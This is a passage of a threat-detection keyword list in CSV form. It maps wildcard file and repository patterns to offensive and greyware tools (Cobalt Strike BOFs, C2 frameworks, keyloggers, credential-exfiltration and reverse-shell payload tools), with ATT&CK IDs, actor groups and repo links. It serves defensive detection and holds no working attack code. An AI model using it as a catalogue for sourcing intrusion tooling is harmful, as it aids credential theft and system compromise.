- T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*obfuscator*antidisassembly.*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*obfuscator.cpp*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,0,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*obfuskittiedump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*objects.githubusercontent.com/github-production-release-asset-*,greyware_tool_keyword,github,Github executables download initiated - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*objects_constrained_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objects_rbcd_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objects_unconstrained_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objexec *.o*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*obscuritylabs*,offensive_tool_keyword,Github Username,resources for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/obscuritylabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*obscuritylabs/ase:latest*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*obscuritylabs/RAI/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*OCSAF/freevulnsearch*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*octetsplicer/LAZYPARIAH*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,1,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*Octoberfest7/KDStab*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*Octoberfest7/TeamsPhisher*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*octopus.py *,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*OEP_Hiijack_Inject_Load*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*offensive_notion.exe*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_darwin_*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_linux_*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_win_*.exe*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*OffensiveCSharp*DriverQuery*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*OffensiveCSharp*ETWEventSubscription*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*OffensiveCSharp-master*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*office2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*office365userenum.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Office-DDE-Payloads*,offensive_tool_keyword,Office-DDE-Payloads,Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.,T1221 - T1222 - T1223,TA0001 - TA0002 - TA0003,N/A,N/A,Phishing,https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads,1,1,N/A,N/A,7,623,161,2023-07-16T08:22:24Z,2017-10-27T22:19:17Z -*Offline_WinPwn.ps1*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*offsecginger/koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*OG-Sadpanda/SharpCat*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*OG-Sadpanda/SharpSword*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*OG-Sadpanda/SharpSword*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*OG-Sadpanda/SharpZippo*,offensive_tool_keyword,cobaltstrike,List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpZippo,1,1,N/A,10,10,55,10,2022-05-24T15:57:33Z,2022-05-24T15:52:31Z -*Oh365UserFinder.git*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*oh365userfinder.py*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*Oh365UserFinder-main*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*oifjbnnafapeiknapihcmpeodaeblbkn*,greyware_tool_keyword,rderzh VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*OLDNamedPipeServer.ps1*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*OleViewDotNet.psd1*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*OlivierLaflamme/PyExec*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*omdakjcmkglenbhjadbccaookpfjihpa*,greyware_tool_keyword,TunnelBear VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*-OMG-Credz-Plz*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*OMGdump.zip*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omghfjlpggmjjaagoclmmobgdodcjboh*,greyware_tool_keyword,Browsec VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*OMGLoggerDecoder*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omg-payloads*/payloads/*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omg-payloads-master*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*OmriBaso/BesoToken*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*On_Demand_C2.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*On-Demand_C2_BOF.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 